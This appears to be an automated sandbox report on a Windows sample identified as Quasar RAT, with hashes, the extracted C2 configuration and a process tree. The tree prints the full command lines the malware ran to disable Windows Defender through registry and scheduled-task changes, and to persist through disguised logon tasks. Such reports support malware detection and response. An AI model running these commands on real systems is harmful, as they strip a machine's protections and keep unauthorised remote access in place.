Overview

overview

10

Static

static

50b2e0afea...90.exe

windows7_x64

10

50b2e0afea...90.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    9s
  • max time network
    26s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    10-03-2022 18:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe

  • Size

    6.2MB

  • MD5

    942b78bcd8a5aa6d10436832b1260671

  • SHA1

    e35e87e58f94e304dd0b97e9b85c6cb30146978d

  • SHA256

    50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90

  • SHA512

    89baba3a305d1d6969b68e4f63c294a861fc755f65ac6d0f5a67f7d6b7aa26cd852f78ce0441af489a70991a9cd0887388687d89efd0f1fb95fb316490d030e3

Score
10/10
quasarwindows security notificationspywaretrojan

Malware Config

Extracted

Family

quasar

Version

2.1.0.0

Botnet

Windows Security Notification

C2

minecraftgaming009-61323.portmap.io:61323

Mutex

VNM_MUTEX_c2q7y2ayYutZ2XaYe7

Attributes
  • encryption_key

    1oSvdU99XhcwnNYl3rB8

  • install_name

    Windows Security Notification.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Security Notification

  • subdirectory

    SubDir

Signatures

  • Contains code to disable Windows Defender 5 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Quasar Payload 5 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
    "C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe
      "C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe"
      2⤵
      • Executes dropped EXE
      PID:1160
    • C:\Users\Admin\AppData\Local\Temp\Knfk.exe
      "C:\Users\Admin\AppData\Local\Temp\Knfk.exe"
      2⤵
      • Executes dropped EXE
      PID:3828
      • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
        "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=
        3⤵
          PID:2208
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
          3⤵
            PID:2368
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              4⤵
                PID:5036
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                4⤵
                  PID:4660
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:636
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                    4⤵
                      PID:928
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:1460
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                        4⤵
                          PID:1808
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                          4⤵
                            PID:908
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            4⤵
                              PID:1300
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                              4⤵
                                PID:2260
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                4⤵
                                  PID:1456
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
                                  4⤵
                                    PID:2272
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                    4⤵
                                      PID:2060
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                      4⤵
                                        PID:3864
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        4⤵
                                          PID:2968
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                          4⤵
                                            PID:4832
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                            4⤵
                                              PID:3060
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                              4⤵
                                                PID:3648
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                4⤵
                                                  PID:3444
                                            • C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3976
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 1684
                                                3⤵
                                                • Program crash
                                                PID:1324
                                            • C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:536
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe" /rl HIGHEST /f
                                                3⤵
                                                • Creates scheduled task(s)
                                                PID:4168
                                              • C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe
                                                "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"
                                                3⤵
                                                  PID:1576
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f
                                                    4⤵
                                                    • Creates scheduled task(s)
                                                    PID:3092
                                              • C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:1408
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe" /rl HIGHEST /f
                                                  3⤵
                                                  • Creates scheduled task(s)
                                                  PID:2128
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" Get-MpPreference -verbose
                                                  3⤵
                                                    PID:3084
                                                  • C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe
                                                    "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"
                                                    3⤵
                                                      PID:4260
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f
                                                        4⤵
                                                        • Creates scheduled task(s)
                                                        PID:1072
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e9Y2mEcb30PK.bat" "
                                                        4⤵
                                                          PID:2456
                                                          • C:\Windows\SysWOW64\chcp.com
                                                            chcp 65001
                                                            5⤵
                                                              PID:552
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4260 -s 2256
                                                            4⤵
                                                            • Program crash
                                                            PID:4716
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3976 -ip 3976
                                                      1⤵
                                                        PID:592
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4260 -ip 4260
                                                        1⤵
                                                          PID:2240

                                                        Network

                                                        MITRE ATT&CK Enterprise v6

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • memory/536-143-0x0000000000950000-0x0000000000974000-memory.dmp

                                                          Filesize

                                                          144KB

                                                          Download

                                                        • memory/536-160-0x000000001CCE0000-0x000000001CCE2000-memory.dmp

                                                          Filesize

                                                          8KB

                                                          Download

                                                        • memory/536-145-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                          Download

                                                        • memory/536-166-0x000000001C980000-0x000000001C9BC000-memory.dmp

                                                          Filesize

                                                          240KB

                                                          Download

                                                        • memory/536-164-0x00000000028B0000-0x00000000028C2000-memory.dmp

                                                          Filesize

                                                          72KB

                                                          Download

                                                        • memory/1160-163-0x0000000004E00000-0x0000000004E92000-memory.dmp

                                                          Filesize

                                                          584KB

                                                          Download

                                                        • memory/1160-162-0x0000000004E00000-0x0000000004E92000-memory.dmp

                                                          Filesize

                                                          584KB

                                                          Download

                                                        • memory/1160-149-0x0000000074B60000-0x0000000075310000-memory.dmp

                                                          Filesize

                                                          7.7MB

                                                          Download

                                                        • memory/1160-152-0x0000000004EE0000-0x0000000004F72000-memory.dmp

                                                          Filesize

                                                          584KB

                                                          Download

                                                        • memory/1160-156-0x0000000004EC0000-0x0000000004ECA000-memory.dmp

                                                          Filesize

                                                          40KB

                                                          Download

                                                        • memory/1160-148-0x0000000000290000-0x0000000000642000-memory.dmp

                                                          Filesize

                                                          3.7MB

                                                          Download

                                                        • memory/1408-150-0x00000000055B0000-0x0000000005B54000-memory.dmp

                                                          Filesize

                                                          5.6MB

                                                          Download

                                                        • memory/1408-147-0x0000000000670000-0x0000000000706000-memory.dmp

                                                          Filesize

                                                          600KB

                                                          Download

                                                        • memory/1408-154-0x0000000004F40000-0x0000000004F41000-memory.dmp

                                                          Filesize

                                                          4KB

                                                          Download

                                                        • memory/1408-165-0x0000000005EE0000-0x0000000005EF2000-memory.dmp

                                                          Filesize

                                                          72KB

                                                          Download

                                                        • memory/1408-157-0x0000000074B60000-0x0000000075310000-memory.dmp

                                                          Filesize

                                                          7.7MB

                                                          Download

                                                        • memory/1408-167-0x0000000006310000-0x000000000634C000-memory.dmp

                                                          Filesize

                                                          240KB

                                                          Download

                                                        • memory/1576-178-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                          Download

                                                        • memory/1576-179-0x000000001C950000-0x000000001C952000-memory.dmp

                                                          Filesize

                                                          8KB

                                                          Download

                                                        • memory/2208-185-0x00000202227E0000-0x00000202227E2000-memory.dmp

                                                          Filesize

                                                          8KB

                                                          Download

                                                        • memory/2208-181-0x00000202225B0000-0x0000020222626000-memory.dmp

                                                          Filesize

                                                          472KB

                                                          Download

                                                        • memory/2208-193-0x0000020222720000-0x0000020222742000-memory.dmp

                                                          Filesize

                                                          136KB

                                                          Download

                                                        • memory/2208-172-0x00000202068B0000-0x0000020206B8A000-memory.dmp

                                                          Filesize

                                                          2.9MB

                                                          Download

                                                        • memory/2208-175-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                          Download

                                                        • memory/2620-130-0x0000000000B60000-0x0000000001196000-memory.dmp

                                                          Filesize

                                                          6.2MB

                                                          Download

                                                        • memory/2620-131-0x00007FFB177A0000-0x00007FFB18261000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                          Download

                                                        • memory/2620-132-0x00000000031D0000-0x00000000031D2000-memory.dmp

                                                          Filesize

                                                          8KB

                                                          Download

                                                        • memory/3084-184-0x0000000002D50000-0x0000000002D51000-memory.dmp

                                                          Filesize

                                                          4KB

                                                          Download

                                                        • memory/3084-187-0x0000000002D52000-0x0000000002D53000-memory.dmp

                                                          Filesize

                                                          4KB

                                                          Download

                                                        • memory/3084-194-0x0000000002D55000-0x0000000002D57000-memory.dmp

                                                          Filesize

                                                          8KB

                                                          Download

                                                        • memory/3084-190-0x0000000006510000-0x000000000652E000-memory.dmp

                                                          Filesize

                                                          120KB

                                                          Download

                                                        • memory/3084-180-0x0000000001500000-0x0000000001536000-memory.dmp

                                                          Filesize

                                                          216KB

                                                          Download

                                                        • memory/3084-189-0x0000000005F50000-0x0000000005FB6000-memory.dmp

                                                          Filesize

                                                          408KB

                                                          Download

                                                        • memory/3084-182-0x00000000057B0000-0x0000000005DD8000-memory.dmp

                                                          Filesize

                                                          6.2MB

                                                          Download

                                                        • memory/3084-183-0x0000000074B60000-0x0000000075310000-memory.dmp

                                                          Filesize

                                                          7.7MB

                                                          Download

                                                        • memory/3084-188-0x0000000006020000-0x0000000006042000-memory.dmp

                                                          Filesize

                                                          136KB

                                                          Download

                                                        • memory/3828-158-0x0000000074B60000-0x0000000075310000-memory.dmp

                                                          Filesize

                                                          7.7MB

                                                          Download

                                                        • memory/3828-151-0x0000000000510000-0x000000000080E000-memory.dmp

                                                          Filesize

                                                          3.0MB

                                                          Download

                                                        • memory/3828-146-0x0000000000510000-0x000000000080E000-memory.dmp

                                                          Filesize

                                                          3.0MB

                                                          Download

                                                        • memory/3828-161-0x0000000004DD0000-0x0000000004DD1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                          Download

                                                        • memory/3828-155-0x0000000005050000-0x00000000050B6000-memory.dmp

                                                          Filesize

                                                          408KB

                                                          Download

                                                        • memory/3976-144-0x0000000000FF0000-0x0000000000FF8000-memory.dmp

                                                          Filesize

                                                          32KB

                                                          Download

                                                        • memory/3976-159-0x0000000074B60000-0x0000000075310000-memory.dmp

                                                          Filesize

                                                          7.7MB

                                                          Download

                                                        • memory/3976-153-0x0000000005A60000-0x0000000005A61000-memory.dmp

                                                          Filesize

                                                          4KB

                                                          Download

                                                        • memory/4260-177-0x00000000057E0000-0x0000000005D84000-memory.dmp

                                                          Filesize

                                                          5.6MB

                                                          Download

                                                        • memory/4260-176-0x0000000074B60000-0x0000000075310000-memory.dmp

                                                          Filesize

                                                          7.7MB

                                                          Download